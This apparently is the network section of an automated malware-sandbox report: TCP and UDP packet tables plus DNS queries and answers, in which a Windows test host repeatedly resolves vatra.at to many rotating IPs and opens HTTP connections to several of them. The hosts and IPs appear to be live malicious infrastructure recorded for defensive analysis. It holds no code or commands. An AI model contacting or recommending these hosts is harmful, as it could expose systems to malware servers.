Jan 8, 2023 16:15:31.398852110 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398935080 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.398958921 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.398999929 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399091005 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.399112940 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399499893 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399594069 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.399609089 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399627924 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399693966 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.399719954 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399774075 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.399792910 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399821043 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399882078 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.399903059 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.399930000 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400021076 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400032997 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400049925 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400104046 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400127888 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400182962 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400188923 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400209904 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400249958 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400281906 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400302887 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400350094 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400409937 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400432110 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400486946 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400551081 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400576115 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400600910 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400680065 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400701046 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400729895 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400794983 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400815010 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400866032 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.400929928 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.400950909 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401024103 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401088953 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401112080 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401189089 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401259899 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401283979 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401392937 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401467085 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401489973 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401595116 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401659012 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401686907 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401721954 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401786089 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401807070 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401885986 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.401953936 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.401973009 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.402102947 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.402163029 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.404086113 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.404144049 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:31.404181957 CET	49701	443	192.168.2.4	5.135.247.111
Jan 8, 2023 16:15:31.404194117 CET	443	49701	5.135.247.111	192.168.2.4
Jan 8, 2023 16:15:33.440361023 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:33.708239079 CET	80	49702	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:33.708702087 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:33.708869934 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:33.708869934 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:33.976722002 CET	80	49702	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:34.607893944 CET	80	49702	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:34.607944965 CET	80	49702	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:34.608146906 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:34.628693104 CET	49702	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:34.693475008 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:34.749468088 CET	80	49703	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:34.749619961 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:34.758521080 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:34.758558989 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:34.813219070 CET	80	49703	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:34.896763086 CET	80	49702	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:35.008306026 CET	80	49703	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:35.008353949 CET	80	49703	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:35.008491039 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:35.008639097 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:35.008639097 CET	49703	80	192.168.2.4	109.98.58.98
Jan 8, 2023 16:15:35.064636946 CET	80	49703	109.98.58.98	192.168.2.4
Jan 8, 2023 16:15:35.082226038 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:35.339793921 CET	80	49704	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:35.340060949 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:35.340337992 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:35.340359926 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:35.598244905 CET	80	49704	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:36.626543045 CET	80	49704	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:36.626832962 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:36.815316916 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:36.884298086 CET	80	49704	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:36.884341002 CET	80	49704	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:36.884557962 CET	49704	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:37.089749098 CET	80	49705	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:37.090120077 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:37.090270042 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:37.090306044 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:37.364367008 CET	80	49705	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:37.973728895 CET	80	49705	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:37.973758936 CET	80	49705	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:37.973911047 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:37.974067926 CET	49705	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:38.008538008 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:38.248158932 CET	80	49705	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:38.258260965 CET	80	49706	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:38.258528948 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:38.258759022 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:38.258784056 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:38.508423090 CET	80	49706	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:39.262161970 CET	80	49706	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:39.262204885 CET	80	49706	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:39.262401104 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:39.262497902 CET	49706	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:39.314804077 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:39.510967970 CET	80	49707	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:39.511120081 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:39.511301041 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:39.511336088 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:39.511702061 CET	80	49706	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:39.713012934 CET	80	49707	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:40.384287119 CET	80	49707	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:40.384565115 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.386594057 CET	80	49707	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:40.386843920 CET	49707	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.420494080 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.593204975 CET	80	49707	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:40.607620001 CET	80	49708	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:40.607741117 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.607968092 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.607968092 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:40.792895079 CET	80	49708	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:41.463578939 CET	80	49708	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:41.463650942 CET	80	49708	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:41.463881016 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.463989019 CET	49708	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.552027941 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.648030996 CET	80	49708	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:41.747323036 CET	80	49709	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:41.747607946 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.747809887 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.747833014 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:41.948369026 CET	80	49709	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:43.060590982 CET	80	49709	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:43.060641050 CET	80	49709	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:43.060775042 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:43.060833931 CET	49709	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:43.253920078 CET	80	49709	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:43.448842049 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:43.640814066 CET	80	49710	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:43.641093969 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:43.972069025 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:43.972130060 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:44.166768074 CET	80	49710	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:44.843065023 CET	80	49710	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:44.843142986 CET	80	49710	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:44.843395948 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:45.214394093 CET	49710	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:45.393500090 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:45.407243967 CET	80	49710	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:45.638845921 CET	80	49711	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:45.639077902 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:45.639230967 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:45.639254093 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:45.885648012 CET	80	49711	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:46.912904978 CET	80	49711	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:46.912939072 CET	80	49711	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:46.913152933 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:47.260708094 CET	49711	80	192.168.2.4	211.119.84.112
Jan 8, 2023 16:15:47.400620937 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:47.506045103 CET	80	49711	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:47.650831938 CET	80	49712	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:47.650943041 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:47.651141882 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:47.651160002 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:47.901356936 CET	80	49712	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:48.999785900 CET	80	49712	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:48.999835968 CET	80	49712	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:49.000025988 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:49.000025988 CET	49712	80	192.168.2.4	211.40.39.251
Jan 8, 2023 16:15:49.035512924 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:49.227484941 CET	80	49713	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:49.227674961 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:49.227821112 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:49.227897882 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:49.250261068 CET	80	49712	211.40.39.251	192.168.2.4
Jan 8, 2023 16:15:49.423549891 CET	80	49713	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:50.108191013 CET	80	49713	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:50.108237028 CET	80	49713	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:50.108376026 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:50.108529091 CET	49713	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:50.291990995 CET	80	49713	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:50.391948938 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:50.604928017 CET	80	49714	187.170.238.164	192.168.2.4
Jan 8, 2023 16:15:50.605182886 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:50.605318069 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:50.605340958 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:50.822434902 CET	80	49714	187.170.238.164	192.168.2.4
Jan 8, 2023 16:15:51.328499079 CET	80	49714	187.170.238.164	192.168.2.4
Jan 8, 2023 16:15:51.328538895 CET	80	49714	187.170.238.164	192.168.2.4
Jan 8, 2023 16:15:51.328615904 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:51.328680992 CET	49714	80	192.168.2.4	187.170.238.164
Jan 8, 2023 16:15:51.367624998 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:51.546037912 CET	80	49714	187.170.238.164	192.168.2.4
Jan 8, 2023 16:15:51.667334080 CET	80	49715	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:51.667519093 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:51.668461084 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:51.668513060 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:51.968282938 CET	80	49715	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:52.865633965 CET	80	49715	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:52.865710974 CET	80	49715	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:52.866039038 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:52.866117954 CET	49715	80	192.168.2.4	58.235.189.192
Jan 8, 2023 16:15:52.962029934 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:53.157162905 CET	80	49716	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:53.157438040 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:53.161920071 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:53.161920071 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:53.165867090 CET	80	49715	58.235.189.192	192.168.2.4
Jan 8, 2023 16:15:53.356467962 CET	80	49716	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:54.063467026 CET	80	49716	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:54.063508987 CET	80	49716	200.46.66.71	192.168.2.4
Jan 8, 2023 16:15:54.063673019 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:54.063755035 CET	49716	80	192.168.2.4	200.46.66.71
Jan 8, 2023 16:15:54.258429050 CET	80	49716	200.46.66.71	192.168.2.4
Jan 8, 2023 16:16:37.905358076 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:16:37.905477047 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:16:37.905563116 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:16:37.932722092 CET	80	49698	194.135.33.42	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2023 16:15:17.385386944 CET	56572	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:17.867503881 CET	53	56572	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:18.947000027 CET	50911	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:19.425726891 CET	53	50911	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:20.920219898 CET	59683	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:21.406945944 CET	53	59683	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:28.623908043 CET	64167	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:29.100198984 CET	53	64167	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:29.408515930 CET	58565	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:29.923669100 CET	53	58565	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:31.046648026 CET	52239	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:31.080674887 CET	53	52239	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:33.419670105 CET	56807	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:33.439090014 CET	53	56807	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:34.674283981 CET	61007	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:34.692118883 CET	53	61007	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:35.060092926 CET	60686	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:35.079653025 CET	53	60686	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:36.783070087 CET	61124	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:36.802289963 CET	53	61124	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:37.988836050 CET	59444	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:38.006567955 CET	53	59444	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:39.296359062 CET	55570	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:39.313945055 CET	53	55570	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:40.398849964 CET	64906	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:40.419629097 CET	53	64906	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:41.532485008 CET	59446	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:41.550576925 CET	53	59446	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:43.427479982 CET	50861	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:43.445261955 CET	53	50861	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:45.374746084 CET	61088	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:45.392477036 CET	53	61088	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:47.346012115 CET	58729	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:47.365782976 CET	53	58729	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:49.017164946 CET	64700	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:49.034532070 CET	53	64700	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:50.121398926 CET	56022	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:50.390979052 CET	53	56022	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:51.343632936 CET	60822	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:51.363027096 CET	53	60822	8.8.8.8	192.168.2.4
Jan 8, 2023 16:15:52.935511112 CET	49750	53	192.168.2.4	8.8.8.8
Jan 8, 2023 16:15:52.959707975 CET	53	49750	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2023 16:15:17.385386944 CET	192.168.2.4	8.8.8.8	0x17e4	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:18.947000027 CET	192.168.2.4	8.8.8.8	0x48b0	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:20.920219898 CET	192.168.2.4	8.8.8.8	0x2fa7	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:28.623908043 CET	192.168.2.4	8.8.8.8	0x43cc	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.408515930 CET	192.168.2.4	8.8.8.8	0xe3a6	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:31.046648026 CET	192.168.2.4	8.8.8.8	0xcb46	Standard query (0)	degroeneuitzender.nl	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.419670105 CET	192.168.2.4	8.8.8.8	0x6c34	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.674283981 CET	192.168.2.4	8.8.8.8	0xb0c3	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.060092926 CET	192.168.2.4	8.8.8.8	0xe537	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.783070087 CET	192.168.2.4	8.8.8.8	0x45f8	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:37.988836050 CET	192.168.2.4	8.8.8.8	0x249c	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.296359062 CET	192.168.2.4	8.8.8.8	0xbb75	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.398849964 CET	192.168.2.4	8.8.8.8	0x8e50	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.532485008 CET	192.168.2.4	8.8.8.8	0x4ca6	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.427479982 CET	192.168.2.4	8.8.8.8	0xa1ce	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.374746084 CET	192.168.2.4	8.8.8.8	0x6065	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.346012115 CET	192.168.2.4	8.8.8.8	0x68cf	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.017164946 CET	192.168.2.4	8.8.8.8	0x177	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.121398926 CET	192.168.2.4	8.8.8.8	0xf541	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.343632936 CET	192.168.2.4	8.8.8.8	0xe6ca	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:52.935511112 CET	192.168.2.4	8.8.8.8	0x26d0	Standard query (0)	vatra.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:17.867503881 CET	8.8.8.8	192.168.2.4	0x17e4	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
